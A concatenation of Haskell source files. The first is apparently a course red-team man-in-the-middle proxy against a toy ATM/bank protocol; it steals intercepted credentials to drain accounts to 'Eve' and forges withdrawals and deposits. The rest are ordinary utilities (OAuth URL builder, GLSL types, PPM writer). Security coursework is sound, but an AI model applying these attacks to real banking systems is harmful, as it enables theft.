    let payload2 = "ZZZZYZZZXZZZWZZZVZZZUZZZTZZZSZZZRZZZQZZZPZZZOZZZNZZZMZZZLZZZKZZZJZZZIZZZHZZZGZZZFZZZEZZZDZZZCZZZBZZZAZZYYZZYXZZYWZZYVZZYUZZYTZZYSZZYRZZYQZZYPZZYOZZYNZZYMZZYLZZYKZZYJZZYIZZYHZZYGZZYFZZYEZZYDZZYCZZYBZZYAZZXYZZXXZZXWZZXVZZXUZZXTZZXSZZXRZZXQZZXPZZXOZZXNZZXMZZXLZZXKZZXJZZXIZZXHZZXGZZXFZZXEZZXDZZXCZZXBZZXAZZWYZZWXZZWWZZWVZZWUZZWTZZWSZZWRZZWQZ"
    --let payload = B.concat [B.replicate 36 0x41, B.replicate 4 1, B.replicate 302 0x42]
    --let payload = payload'
    bank1 <- connectTo "localhost" bankPort
    sendPayload bank1 payload1 continuation2
    bank2 <- connectTo "localhost" bankPort
    sendPayload bank2 payload2 continuation2
-- | Protocol command codes; the wire format carries 'fromEnum' of these, so
-- the constructor order is part of the protocol and must not be changed.
data ActionType = Balance | Deposit | Login | Logout | Malformed | Transfer | Unknown | Withdraw
    deriving (Enum, Eq, Show)
-- | One decrypted protocol message.
data Action = Action {
    actUser :: B.ByteString,
    actPin :: B.ByteString,
    actOldNonce :: B.ByteString,
    actNewNonce :: B.ByteString,
    actCmd :: ActionType,
    actAmount :: Int, -- cents
    actRecipient :: B.ByteString
    } deriving Show
-- | Parse the wire format: "old;new:PAD1:user;pin;cmd;amount;recipient:PAD2"
-- (':'-separated groups, ';'-separated fields).  Nothing on any shape
-- mismatch or unreadable command number.
-- NOTE(review): 'toEnum' is partial — a command number outside 0..7 from a
-- hostile peer would crash here rather than yield Nothing.
deserializeAction :: B.ByteString -> Maybe Action
deserializeAction s = aux where
    readB = readMaybe . bsToString
    split' c = B.split (fromIntegral $ ord c)
    aux = case map (split' ';') $ split' ':' s of
        [[oldNonce, newNonce],[_],[user,pin,cmd,amount,recipient],[_]] -> do
            cmd' <- readB cmd
            return $ Action {
                actUser = user,
                actPin = pin,
                actOldNonce = oldNonce,
                actNewNonce = newNonce,
                actCmd = toEnum cmd',
                actAmount = maybe 0 id $ readB amount,
                actRecipient = recipient
                }
        _ -> Nothing
-- | Inverse of 'deserializeAction': pad the message out to a fixed 128-byte
-- buffer ('A'/'B' filler instead of the commented-out random padding so that
-- nonces stay separator-free).  pad2Size can go negative for oversized
-- fields, in which case B.replicate yields empty and the message is short.
serializeAction :: MonadRandom m => Action -> m B.ByteString
serializeAction (Action user pin oNonce nNonce cmd amt reci) = do
    let actionBufferSize = 128
    let cmd' = showBS $ fromEnum cmd
    let amt' = showBS amt
    let pad1Size = 1
    let pad2Size = actionBufferSize - (sum (map B.length [oNonce, nNonce, user, pin, cmd', amt', reci]) + 8 + pad1Size)
    --pad1 <- getRandomBytes pad1Size
    --pad2 <- getRandomBytes pad2Size
    let pad1 = B.replicate pad1Size 0x41
    let pad2 = B.replicate pad2Size 0x42
    return $ B.intercalate ":" [
        B.intercalate ";" [oNonce, nNonce],
        pad1,
        B.intercalate ";" [user, pin, cmd', amt', reci],
        pad2
        ]
-- Rewrite an outgoing Logout into a Deposit of 31337 cents, re-encrypting
-- under the session cipher; anything else passes through untouched.
-- (Unfortunately the server checks for this and prints "These shouldn't
-- happen." to stdout.)
replaceLogoutWithDeposit aes aesIv action ctxt
    | actCmd action /= Logout = return ctxt
    | otherwise = do
        serialized <- serializeAction (action { actCmd = Deposit, actAmount = 31337 })
        return (cfbEncrypt aes aesIv serialized)
-- semicolons/colons in the nonce will mess things up, use constant A's for now
--makeNonce = getRandomBytes 16
-- NOTE(review): only 15 bytes here although the disabled random version used
-- 16 — presumably deliberate (leaves room elsewhere in the padded buffer),
-- but confirm against serializeAction's size arithmetic.
makeNonce = return $ B.replicate 15 0x41
-- | Advance an action's nonce chain: the previous "new" nonce becomes the
-- old one and a fresh nonce is generated.
nextNonce :: MonadRandom m => Action -> m Action
nextNonce a@(Action {actNewNonce = oldNonce}) = do
    newNonce <- makeNonce
    return $ a { actOldNonce = oldNonce, actNewNonce = newNonce }
-- | Using credentials sniffed by 'interceptCreds', open our own session to
-- the bank and drain the account: Login, Balance, Transfer of the full
-- balance to "Eve", Logout.  Performs the client half of the handshake
-- honestly (we know the bank's real key), then walks the nonce-chained
-- request/response protocol; each step runs inside the previous step's
-- 'getAction' continuation so a malformed reply silently ends the session.
frontRunLogin bankPort username pin = do
    let bufferSize = 4096
    let pubSizeBits = 3072
    putStrLn $ "Intercepted creds " ++ show username ++ ":" ++ show pin
    putStrLn "Transferring everything to Eve"
    bank <- connectTo "localhost" bankPort
    hSetBuffering bank (BlockBuffering (Just bufferSize))
    let putFlush x = B.hPut bank x >> hFlush bank
    -- handshake: hello, fetch bank key, send AES key / IV / initial nonce
    putFlush "DUMMY"
    bankPubRaw <- B.hGetSome bank bufferSize
    let bankPub = maybe (error "Failed to decode bank pubkey") id $ decodeX509Pubkey (L.fromChunks [bankPubRaw])
    let bankPub' = bankPub { public_size = pubSizeBits `div` 8 } -- fiddle with things to get them to work
    let pubEncrypt = fmap (either (error . show) id) . encrypt (defaultOAEPParams SHA1) bankPub'
    rawAES <- getRandomBytes 16
    let aes = makeAES rawAES
    mitmAES <- pubEncrypt rawAES
    putFlush mitmAES
    expect bank "DUMMY"
    rawIV <- getRandomBytes 16
    mitmIV <- pubEncrypt rawIV
    putFlush mitmIV
    expect bank "DUMMY"
    let Just aesIV = makeIV rawIV
    rawNonce <- makeNonce
    let mitmNonce = cfbEncrypt aes aesIV rawNonce
    putFlush mitmNonce
    expect bank "DUMMY"
    -- session helpers: encrypt-and-send, and receive-decrypt-parse
    let enc = cfbEncrypt aes aesIV
    let dec = cfbDecrypt aes aesIV
    let sendAction a = do
          --putStr "Sending: " >> print a
          a' <- serializeAction a
          --print a'
          let a'' = enc a'
          --print a''
          putFlush a''
    let getAction k = do
          tmp <- B.hGetSome bank bufferSize
          --print tmp
          let tmp' = dec tmp
          --print tmp'
          let r = deserializeAction tmp'
          --print r
          case r of
            Nothing -> return ()
            Just r' -> k r'
    -- reuse the server's reply (which carries the current nonce chain) as
    -- the template for our next request
    let updateAction a f = fmap f $ nextNonce a
    newNonce <- makeNonce
    let a1 = Action username pin rawNonce newNonce Login 0 ""
    sendAction a1
    getAction $ \r1 -> do
        a2 <- updateAction r1 $ (\a -> a {actCmd = Balance})
        sendAction a2
        getAction $ \r2 -> do
          let f = (\a -> a {actCmd = Transfer, actRecipient = "Eve", actAmount = actAmount r2})
          a3 <- updateAction r2 f
          sendAction a3
          getAction $ \r3 -> do
            a4 <- updateAction r3 $ (\a -> a {actCmd = Logout})
            sendAction a4
            getAction $ \r4 -> if actCmd r4 == Malformed
              then putStrLn "Transfer failed"
              else putStrLn "Transfer successful"
    return ()
-- Hook for passiveMitm: when a Login with a non-empty PIN from anyone other
-- than "Eve" passes through, immediately race the victim with frontRunLogin.
interceptCreds bankPort action
    | shouldSteal = frontRunLogin bankPort (actUser action) (actPin action)
    | otherwise = return ()
  where
    shouldSteal =
        actCmd action == Login
        && not (B.null (actPin action))
        && actUser action /= "Eve"
-- | Passive observer: decrypt each chunk, log the parsed action (or the raw
-- plaintext if parsing fails), feed it to 'hook' (bounded to 5 s so a slow
-- hook cannot stall the proxy; the timeout's Maybe result is discarded),
-- and always forward the original ciphertext untouched.
-- NOTE(review): the 'let action = ...' binding is dead — it is immediately
-- shadowed by the case pattern, which re-parses the same plaintext.
passiveMitm hook atm bank logTo logFrom aes aesIv = dumbProxy atm bank (wrap logTo) (wrap logFrom) where
    wrap log ctxt = do
        let ptxt = cfbDecrypt (aes :: AES128) aesIv ctxt
        let action = deserializeAction ptxt
        case deserializeAction ptxt of
            Just action -> do
                log (showBS action)
                --replaceLogoutWithDeposit aes aesIv action ctxt
                timeout (5*10^6) $ hook action
                return ctxt
            _ -> do
                log ptxt
                return ctxt
-- | Active rewrite: an ATM Withdraw is turned into a Balance query on the
-- way to the bank, and the IORef flag makes the bank's next reply be
-- rewritten back into a Withdraw — so the ATM dispenses cash the bank never
-- debited.  Unparseable chunks pass through unchanged.
arbitraryWithdrawal atm bank logTo logFrom aes aesIv = aux where
    decrypt = deserializeAction . cfbDecrypt (aes :: AES128) aesIv
    encrypt = fmap (cfbEncrypt aes aesIv) . serializeAction
    aux = do
        intercept <- newIORef False
        let interceptTo ctxt = do
              case decrypt ctxt of
                Just a -> logTo (showBS a) >> if actCmd a == Withdraw
                    then do
                        writeIORef intercept True
                        encrypt $ a { actCmd = Balance }
                    else encrypt a
                Nothing -> return ctxt
        let interceptFrom ctxt = do
              case decrypt ctxt of
                Just a -> do
                    logFrom (showBS a)
                    i <- readIORef intercept
                    writeIORef intercept False
                    encrypt $ if i then a { actCmd = Withdraw } else a
                Nothing -> return ctxt
        dumbProxy atm bank interceptTo interceptFrom
-- | Per-connection driver: dial the real bank, build direction-tagged
-- loggers, run the man-in-the-middle handshake to obtain the session
-- cipher, then hand both handles plus the key material to the chosen
-- traffic handler @k@.
doMitm bankPort k (atm, host, atmPort) = do
    putStrLn $ "Received a connection from " ++ host ++ ":" ++ show atmPort
    putStrLn $ "Forwarding to localhost:" ++ show (unPort bankPort)
    bank <- connectTo "localhost" bankPort
    let log p q s = (putStrLn $ show p ++ " -> " ++ show q ++ ": " ++ show s) >> return s
    let logTo = log atmPort (unPort bankPort) :: B.ByteString -> IO B.ByteString
    let logFrom = log (unPort bankPort) atmPort :: B.ByteString -> IO B.ByteString
    (aes, aesIV) <- mitmHandshake atm bank logTo logFrom
    k atm bank logTo logFrom aes aesIV
| aweinstock314/sheedb_weinsa_crypto2015_project | redteam/MitmProxy.hs | agpl-3.0 | 15,345 | 1 | 24 | 3,949 | 4,461 | 2,169 | 2,292 | -1 | -1 |
{-# LANGUAGE OverloadedStrings #-}
module Ledger.Application.Transformer.EntryOutput where
import Ledger.Application.Model.Entry (Entry, entryAmount, entryDescription,
entryId, entryTime, unEntryId)
import Data.Aeson (ToJSON, object, toJSON, (.=))
import Data.Text (Text)
import Data.Time (UTCTime)
-- | JSON-facing projection of a ledger 'Entry' (see 'toEntryOutput').
data EntryOutput = EntryOutput
    { entryOutputAmount :: Double -- ^ amount, converted from the entry's Rational
    , entryOutputDescription :: Text -- ^ free-form description
    , entryOutputId :: Integer -- ^ unwrapped entry id
    , entryOutputTime :: UTCTime -- ^ entry timestamp
    } deriving (Read, Show)
-- Serialize as a flat object with "amount", "description", "id" and "time".
instance ToJSON EntryOutput where
    toJSON output = object fields
      where
        fields =
            [ "amount" .= entryOutputAmount output
            , "description" .= entryOutputDescription output
            , "id" .= entryOutputId output
            , "time" .= entryOutputTime output
            ]
-- | Project a domain 'Entry' onto its JSON representation: unwrap the id
-- and convert the exact Rational amount to a Double.
toEntryOutput :: Entry -> EntryOutput
toEntryOutput e = EntryOutput
    { entryOutputId = unEntryId (entryId e)
    , entryOutputAmount = fromRational (entryAmount e)
    , entryOutputDescription = entryDescription e
    , entryOutputTime = entryTime e
    }
| asm-products/ledger-backend | library/Ledger/Application/Transformer/EntryOutput.hs | agpl-3.0 | 1,120 | 0 | 9 | 262 | 247 | 143 | 104 | 25 | 1 |
{-# LANGUAGE GeneralizedNewtypeDeriving, TemplateHaskell #-}
module Auth where
import Relude
import qualified Data.ByteString.Builder as BSB
import qualified Data.ByteString.Lazy as BSL
import qualified Data.Text.Encoding as T
import qualified Network.HTTP.Types.URI as W
-- Types -----------------------------------------------------------------------
-- | Some arbitrary token that is passed through Google's servers.
-- This is useful for preventing request forgeries.
newtype StateToken = StateToken { _stTokText ∷ Text }
-- | OAuth2 client identifier issued by the Google developer console.
newtype ClientID = ClientID { _clientIDText ∷ Text }
newtype Scope = Scope { _scopeText ∷ Text } -- May not contain spaces
type AuthScope = [Scope]
type EmailAddress = Text
-- | Whether a refresh token is requested (Offline) or not (Online).
data AccessType = Online | Offline
-- | Whether the consent screen is always shown or only when required.
data PromptWhen = PromptAlways | PromptAuto
newtype URI = URI { _uriBS ∷ ByteString }
-- | Everything needed to build an authorization-endpoint URL; rendered by
-- 'fmtAuthParams' / 'authURL'.
data AuthParams = AuthParams {
    _clientID ∷ ClientID
  , _redirectURI ∷ URI
  , _stateTok ∷ StateToken
  , _accessTy ∷ AccessType
  , _scope ∷ AuthScope
  , _promptWhen ∷ PromptWhen
  , _emailAddress ∷ Maybe EmailAddress
  , _includeGrantedScopes ∷ Bool
  }
-- Instances ------------------------------------------------------------------
deriving instance Eq StateToken
deriving instance IsString StateToken
deriving instance IsString Scope
deriving instance Eq URI
deriving instance Ord URI
deriving instance Monoid URI
deriving instance IsString URI
instance Show URI where
  show (URI u) = show u
-- Template Haskell lens generation for the field accessors used below.
makeLenses ''ClientID
makeLenses ''Scope
makeLenses ''AuthParams
makeLenses ''StateToken
makeLenses ''URI
-- Values ----------------------------------------------------------------------
-- | Sample parameter set (placeholder client id, Google's demo redirect).
authExample ∷ AuthParams
authExample = AuthParams
  { _clientID = ClientID "000000000000-00000000000000000000000000000000.apps.googleusercontent.com"
  , _redirectURI = "https://oauth2-login-demo.appspot.com/code"
  , _stateTok = ""
  , _accessTy = Online
  , _scope = ["https://www.googleapis.com/auth/calendar.readonly"]
  , _promptWhen = PromptAuto
  , _emailAddress = Nothing
  , _includeGrantedScopes = True
  }
-- | Google's OAuth2 authorization endpoint; 'authURL' appends the query.
authBase ∷ Text
authBase = "https://accounts.google.com/o/oauth2/auth"
-- | Render the complete authorization URL: 'authBase' plus the
-- percent-encoded query produced from the parameters.
authURL ∷ AuthParams → URI
authURL params = URI (BSL.toStrict (BSB.toLazyByteString builder))
  where
    builder = BSB.byteString (T.encodeUtf8 authBase) <> "?" <> query
    query = W.renderQueryText False (fmtAuthParams params)
-- https://developers.google.com/identity/protocols/OAuth2WebServer#formingtheurl
-- | Render 'AuthParams' as the key/value pairs Google's authorization
-- endpoint expects; absent optional parameters (only login_hint) are
-- dropped rather than sent empty.
fmtAuthParams ∷ AuthParams → [(Text,Maybe Text)]
fmtAuthParams params = [ (k, Just v) | Just (k, v) <- entries ]
  where
    entries ∷ [Maybe (Text, Text)]
    entries =
      [ Just ("response_type", "code")
      , Just ("client_id", params ^. clientID . clientIDText)
      , Just ("redirect_uri", T.decodeUtf8 (params ^. redirectURI . uriBS))
      , Just ("scope", scopesText)
      , Just ("state", params ^. stateTok . stTokText)
      , Just ("access_type", accessText)
      , Just ("approval_prompt", promptText)
      , ("login_hint",) <$> params ^. emailAddress
      , Just ("include_granted_scopes", grantedText)
      ]
    -- scopes are space-separated (Scope values never contain spaces)
    scopesText = fold (intersperse " " (view scopeText <$> params ^. scope))
    accessText = case params ^. accessTy of
                   Online  → "online"
                   Offline → "offline"
    promptText = case params ^. promptWhen of
                   PromptAuto   → "auto"
                   PromptAlways → "force"
    grantedText = if params ^. includeGrantedScopes then "true" else "false"
| bsummer4/gcal | src/Auth.hs | agpl-3.0 | 3,628 | 0 | 15 | 789 | 795 | 456 | 339 | -1 | -1 |
{-# LANGUAGE GADTs, KindSignatures, FlexibleInstances, FlexibleInstances
, MultiParamTypeClasses, FunctionalDependencies
, UndecidableInstances, TypeOperators, ScopedTypeVariables
, FlexibleContexts, CPP
#-}
{-# LANGUAGE StandaloneDeriving #-}
{-# OPTIONS_GHC -Wall -fno-warn-orphans #-}
----------------------------------------------------------------------
-- |
-- Module : Shady.Language.Type
-- Copyright : (c) Conal Elliott 2009
-- License : GPLv3
--
-- Maintainer : conal@conal.net
-- Stability : experimental
--
-- Types
----------------------------------------------------------------------
module Shady.Language.Type
(
-- * Type values
ScalarT(..), VectorT(..), Type(..)
, TextureId, Sampler(..), sampler1, sampler2, sampler3, Sampler1, Sampler2, Sampler3
-- * Generating type values
, IsScalar(..), vectorT, HasType(..)
, typeOf, typeOf1, typeOf2, compatible, compatible1
, IsVec(..),checkVec, checkVec'
-- * Type equality
, (:=:)(..), ptyEq, vtyEq, tyEq
, (=:=), (===)
-- * Vector operations
-- , Vector(..)
-- * Convenient type synonyms
, R, R1, R2, R3, R4, B1, Pred1, Pred2
-- * Notions of equality
, SynEq(..),SynEq2(..)
-- * Pairing and unit
, PairF(..), (:#), UnitF(..)
-- * Re-export
, module TypeUnary.Vec
) where
import Control.Applicative (liftA2,Const(..))
import Data.Maybe (isJust)
import Data.Foldable (toList)
-- import Data.List (intercalate)
import Control.Monad.Instances ()
import Foreign.Storable
import Data.Typeable (Typeable)
import Text.PrettyPrint.Leijen
import Text.PrettyPrint.Leijen.PrettyPrec
import Text.PrettyPrint.Leijen.DocExpr
import TypeUnary.Vec
import Shady.Misc (FMod(..),R)
import Data.Proof.EQ
-- import Shady.Language.Equality
-- import Shady.MechanicsGL (GlTexture)
{--------------------------------------------------------------------
Type values
--------------------------------------------------------------------}
-- Primitive types
-- | GADT of GLSL scalar types, indexed by the Haskell type they represent.
data ScalarT :: * -> * where
  Bool :: ScalarT Bool
  Int :: ScalarT Int
  Float :: ScalarT Float
-- Rendered names match the GLSL keywords.
instance Show (ScalarT a) where
  show Bool = "bool"
  show Int = "int"
  show Float = "float"
instance HasExprU ScalarT where
  exprU Bool = var "bool"
  exprU Int = var "int"
  exprU Float = var "float"
instance Pretty (ScalarT a) where pretty = text . show
instance PrettyPrec (ScalarT a)
-- | Turn any showable value into a variable expression named after it.
vshow :: Show a => a -> Expr
vshow = var . show
instance HasExpr (ScalarT a) where expr = vshow
-- | Vector type: a statically-known length paired with a scalar type.
data VectorT n a = VectorT (Nat n) (ScalarT a)
instance Show (VectorT n a) where
  show (VectorT n t) = showVectorN (natToZ n) t
-- instance HasExpr a => HasExpr (VectorT a) where expr = expr1
-- instance HasExpr1 VectorT where expr1 = var . show
instance HasExprU (VectorT n) where exprU = expr
instance HasExpr (VectorT n a) where expr = var . show
-- | GLSL name for an n-vector of the given scalar type: a 1-vector is just
-- the scalar name; otherwise the scalar's prefix ("b"/"i"/"") plus "vecN".
showVectorN :: Integer -> ScalarT a -> String
showVectorN 1 t = show t
showVectorN n t = scalarPrefix t ++ "vec" ++ show n
  where
    scalarPrefix :: ScalarT b -> String
    scalarPrefix Bool = "b"
    scalarPrefix Int = "i"
    scalarPrefix Float = ""
instance Pretty (VectorT n a) where pretty = text . show
instance PrettyPrec (VectorT n a)
-- | Encoding of texture ids in values. I'm using 'Int' instead of
-- @GLuint@ here to avoid depending on OpenGL in this module & package.
type TextureId = Int
-- | An @n@-dimensional GLSL sampler.
data Sampler n =
  Sampler { samplerDim :: Nat n, samplerTexture :: TextureId }
type Sampler1 = Sampler N1
type Sampler2 = Sampler N2
type Sampler3 = Sampler N3
instance Show (Sampler n) where
  show (Sampler n tex) = "<Sampler "++show n++" "++show tex++">"
instance Pretty (Sampler n) where
  pretty = text . show
instance PrettyPrec (Sampler n)
instance HasExpr (Sampler n)
-- Dimension-specific smart constructors for samplers over a texture id.
sampler1 :: TextureId -> Sampler1
sampler1 = Sampler one -- or Sampler nat
sampler2 :: TextureId -> Sampler2
sampler2 = Sampler two -- or Sampler nat
sampler3 :: TextureId -> Sampler3
sampler3 = Sampler three -- or Sampler nat
-- | Extended types. Vector types, samplers, unit, pairing, and functions.
--
-- A singleton GADT: a value of @Type t@ both witnesses and determines the
-- Haskell type @t@, which is what makes the runtime type-equality checks
-- ('tyEq', '=:=') below possible.
data Type :: * -> * where
  VecT :: (IsNat n, IsScalar a {-, Storable (Vec n a) -}) =>
          VectorT n a -> Type (Vec n a)
  SamplerT :: IsNat n => Nat n -> Type (Sampler n)
  UnitT :: Type ()
  (:*:) :: (HasType a, HasType b {-, Show a, Show b -}) =>
           Type a -> Type b -> Type (a , b)
  (:->:) :: (HasType a, HasType b {-, Show a, Show b -}) =>
            Type a -> Type b -> Type (a -> b)

-- Rendering of types.  Pairs and functions print as right-associative
-- infix operators, with pairing (precedence 1) binding tighter than
-- function arrows (precedence 0).
instance HasExpr (Type t) where
  expr (VecT t) = expr t
  expr (SamplerT n) = var $ "sampler" ++ show n ++ "D"
  expr UnitT = var "()"
  expr (a :*: b) = op InfixR 1 ":*" (expr a) (expr b)
  expr (a :->: b) = op InfixR 0 "->" (expr a) (expr b)

instance HasExprU Type where exprU = expr

instance PrettyPrec (Type t) where prettyPrec = prettyExpr

instance Pretty (Type t) where pretty = prettyPrec 0

instance Show (Type t) where show = show . expr
{--------------------------------------------------------------------
Generating type values
--------------------------------------------------------------------}
-- EXPERIMENTAL: Typeable constraints

-- | Has scalar type.  The 'Storable' and pretty-printing superclasses
-- simplify explicit constraints at use sites.
class (Storable a, Typeable a, PrettyPrec a) => IsScalar a where scalarT :: ScalarT a

-- The Storable and Show prereqs simplify explicit constraints at uses.

instance IsScalar Bool where scalarT = Bool

instance IsScalar Int where scalarT = Int

instance IsScalar Float where scalarT = Float

-- | The vector-type value determined entirely by the statically known
-- length @n@ and scalar element type @a@.
vectorT :: (IsNat n, IsScalar a) => VectorT n a
vectorT = VectorT nat scalarT
-- | Known types: types whose 'Type' representation can be reified from
-- the type alone.
class HasExpr t => HasType t where typeT :: Type t

-- Sorry about that Show constraint. It's ultimately motivated by
-- the constant folding optimization and from there creeps into *lots* of contexts.
-- The Show t is experimental. If it works out, remove Show from a lot of contexts.

instance (IsNat n, IsScalar a {-, Storable (Vec n a)-}) =>
         HasType (Vec n a) where
  typeT = VecT vectorT

instance HasType () where typeT = UnitT

-- Pair and function instances build the representation structurally from
-- the component representations.
instance (HasType a, HasType b {-, Show a, Show b -}) =>
         HasType (a, b) where typeT = typeT :*: typeT

instance (HasType a, HasType b {-, Show a, Show b -}) =>
         HasType (a->b) where typeT = typeT :->: typeT

instance IsNat n => HasType (Sampler n) where
  typeT = SamplerT nat
-- | Reify the type of a value.  The argument is never inspected; only its
-- type matters.
typeOf :: HasType a => a -> Type a
typeOf _ = typeT

-- | Reify the type argument of a unary type constructor.
typeOf1 :: HasType a => f a -> Type a
typeOf1 _ = typeT

-- | Reify the type argument's argument (two constructors deep).
typeOf2 :: HasType a => g (f a) -> Type a
typeOf2 _ = typeT
-- | Demonstration that a type argument is a vector type.  Matching the
-- 'IsVec' constructor brings the @IsNat@/@IsScalar@ dictionaries back
-- into scope.
data IsVec :: * -> * where
  IsVec :: (IsNat n, IsScalar a) => IsVec (Vec n a)

-- | Check for a vector type.  Inspects the reified 'Type' of @t@; the
-- GADT match on 'VecT' refines @t@ to @Vec n a@, which is what justifies
-- producing 'IsVec'.
checkVec :: forall t. HasType t => Maybe (IsVec t)
checkVec =
  case (typeT :: Type t) of
    VecT _ -> Just IsVec
    _ -> Nothing

-- | Convenient wrapper around 'checkVec'. Ignores argument.
checkVec' :: forall f t. HasType t => f t -> Maybe (IsVec t)
checkVec' = const checkVec
{--------------------------------------------------------------------
Type equality
--------------------------------------------------------------------}
-- | Try to prove equality of primitive types.  A successful match on the
-- same constructor refines both indices to the same type.
ptyEq :: ScalarT a -> ScalarT b -> Maybe (a :=: b)
ptyEq x y = case (x, y) of
              (Bool , Bool ) -> Just Refl
              (Int  , Int  ) -> Just Refl
              (Float, Float) -> Just Refl
              _              -> Nothing

-- | Try to prove equality of vector types: lengths and element types must
-- both agree.
vtyEq :: VectorT m a -> VectorT n b -> Maybe (Vec m a :=: Vec n b)
vtyEq (VectorT m a) (VectorT n b) = do
  lenProof <- m `natEq` n
  eltProof <- a `ptyEq` b
  return (liftEq2 lenProof eltProof)

-- | Try to prove equality of types, structurally.
tyEq :: Type c -> Type c' -> Maybe (c :=: c')
tyEq (VecT a) (VecT a') = vtyEq a a'
tyEq (SamplerT n) (SamplerT n') = fmap liftEq (natEq n n')
tyEq UnitT UnitT = Just Refl
tyEq (a :*: b) (a' :*: b') = do
  fstProof <- tyEq a a'
  sndProof <- tyEq b b'
  return (liftEq2 fstProof sndProof)
tyEq (a :->: b) (a' :->: b') = do
  domProof <- tyEq a a'
  ranProof <- tyEq b b'
  return (liftEq2 domProof ranProof)
tyEq _ _ = Nothing
-- TODO: Maybe define a class & method for the various typed equality
-- functions, with a nice infix method name.
-- | Yields 'Just' 'Refl' if type-compatible /and/ syntactically equal.
-- Otherwise 'Nothing'.  The 'Refl' from 'tyEq' is what licenses comparing
-- @fa@ and @fb@ with '(=-=)', which requires identical index types.
(=:=) :: forall f a b. (HasType a, HasType b, SynEq f) =>
         f a -> f b -> Maybe (a :=: b)
fa =:= fb =
  case typeOf1 fa `tyEq` typeOf1 fb of
    Just Refl | fa =-= fb -> Just Refl
    _                     -> Nothing

-- | Same type and syntactically equal.
(===) :: forall f a b. (HasType a, HasType b, SynEq f) =>
         f a -> f b -> Bool
(===) fa fb = isJust (fa =:= fb)

-- | Do two values have the same type?  If so, return a proof.
compatible :: (HasType a, HasType b) => a -> b -> Maybe (a :=: b)
compatible x y = typeOf x `tyEq` typeOf y

-- | Do two values have the same (first) type argument?  If so, return a
-- proof.
compatible1 :: (HasType a, HasType b) => f a -> g b -> Maybe (a :=: b)
compatible1 x y = typeOf1 x `tyEq` typeOf1 y
{--------------------------------------------------------------------
Convenient type synonyms
--------------------------------------------------------------------}
-- TODO: Maybe move R to Misc and use in defining EyePos in MechanicsGL
-- | Convenient short-hand: 1-vector of reals.
type R1 = Vec1 R

-- | Convenient short-hand: 2-vector of reals.
type R2 = Vec2 R

-- | Convenient short-hand: 3-vector of reals.
type R3 = Vec3 R

-- | Convenient short-hand: 4-vector of reals.
type R4 = Vec4 R

-- | Single boolean (1-vector), matching GLSL's vector-typed predicates.
type B1 = Vec1 Bool

-- | Unary predicate
type Pred1 a = a -> B1

-- | Binary predicate
type Pred2 a = a -> Pred1 a
{--------------------------------------------------------------------
Notions of equality
--------------------------------------------------------------------}
infix 4 =-=, =--=

-- | Syntactic equality. Requires same argument type.
class SynEq f where
  (=-=) :: HasType c => f c -> f c -> Bool

instance Eq x => SynEq (Const x) where (=-=) = (==)

-- | Higher-order variant of 'SynEq'. Can be defined via '(=-=)', or vice versa.
class SynEq2 f where
  (=--=) :: (SynEq v, HasType c) => f v c -> f v c -> Bool

-- NOTE(review): standalone-derived orphan; newer versions of base ship an
-- Eq instance for Const, which would clash with this one -- verify against
-- the base version this package builds with.
deriving instance Eq a => Eq (Const a b)
{--------------------------------------------------------------------
Pairing
--------------------------------------------------------------------}
infixr 1 #, :#

-- | Functors supporting pairing: combine an @f a@ and an @f b@ into an
-- @f@ of the pair.
class PairF f where
  (#) :: (HasType a, HasType b {-, Show a, Show b -}) =>
         f a -> f b -> f (a :# b)

-- | Syntactic alternative for pairing. Convenient for right-associative
-- infix use.
type a :# b = (a,b)

-- | Functors with a unit value at the unit type.
class UnitF f where unit :: f ()
{--------------------------------------------------------------------
Orphans
--------------------------------------------------------------------}
-- Orphan instances.  Pretty-printing lives here rather than in the Vec
-- package so that 'VectorT' is available; numeric instances are here
-- because Show is here.

instance (IsNat n, IsScalar a, Pretty a) => Pretty (Vec n a) where
  pretty v = case toList v of
               [c] -> pretty c                       -- 1-vectors print bare
               cs  -> pretty (vectorT :: VectorT n a) <> tupled (map pretty cs)

-- Historical note (2011-10-26): a Show instance matching the rendering
-- above was removed in favor of a Haskell-eval'able Show instance in
-- TypeUnary.Vec.  Code generation uses Pretty, not Show.

instance (IsNat n, IsScalar a, Pretty a) => PrettyPrec (Vec n a)

instance (IsNat n, IsScalar a, PrettyPrec a) => HasExpr (Vec n a)

-- | Componentwise floating-point modulus.
instance (IsNat n, IsScalar a, FMod a) => FMod (Vec n a) where
  fmod = liftA2 fmod
| sseefried/shady-gen | src/Shady/Language/Type.hs | agpl-3.0 | 12,068 | 0 | 12 | 2,642 | 3,238 | 1,752 | 1,486 | 187 | 3 |
module Print2 where

-- | Print a two-line counting rhyme: a header line, then the count built
-- from three pieces on a single line.
main :: IO ()
main = do
  putStrLn "Count to four for me:"
  mapM_ putStr ["one, two", ", three and"]
  putStrLn " four!"
| thewoolleyman/haskellbook | 03/03/chad/print2.hs | unlicense | 143 | 0 | 7 | 35 | 43 | 19 | 24 | 7 | 1 |
{- Image.hs
- Write an image to PPM (Portable Pixmap) format.
- http://en.wikipedia.org/wiki/Portable_pixmap
-
- Timothy A. Chagnon
- CS 636 - Spring 2009
-}
module Image where
import Color
-- | Render one pixel as a PPM P3 sample triple: the red, green and blue
-- components separated by single spaces.
p3color :: Color -> String
p3color (r, g, b) = show r ++ " " ++ show g ++ " " ++ show b
-- | Write pixels to a plain-text PPM (P3) file.
--
-- The output is the \"P3\" magic number, the image dimensions and the
-- maximum sample value on a header line, followed by one pixel per line.
-- The pixel list is assumed to hold @width * height@ entries in row-major
-- order (not checked here).
writePPM :: String -> Int -> Int -> [Color] -> IO ()
writePPM file width height pixels = writeFile file outData
 where
   magic    = "P3"
   -- 255 is the PPM "maxval": the largest value a color sample may take.
   maxval   = 255
   params   = unwords (map show [width, height, maxval])
   p3pixels = map p3color pixels
   outData  = unlines ([magic, params] ++ p3pixels)
| tchagnon/cs636-raytracer | a1/Image.hs | apache-2.0 | 654 | 0 | 14 | 149 | 199 | 102 | 97 | 12 | 1 |
module CodeWars.MoleculeToAtoms where
import Debug.Trace
import System.Random
import Control.Monad.State.Lazy
-- Flipped 'Debug.Trace.trace': @value `debug` message@ prints the message
-- when the value is forced.  Debugging aid only.
debug = flip trace

-- | Parse a molecular formula into a list of (atom, count) pairs.
-- NOTE(review): stub -- the @formula@ argument is ignored and every input
-- is rejected with the same error.  TODO: implement.
parseMolecule :: String -> Either String [(String,Int)]
parseMolecule formula = Left "Not a valid molecule"

-- NOTE(review): unimplemented helper; evaluating it crashes with
-- 'undefined'.  Intended signature suggests a recursive parser taking the
-- remaining input plus some accumulator/terminator string.
parseM :: String -> String -> Either String [(String,Int)]
parseM = undefined

-- randomSt :: (Random a, RandomGen g) => State g a
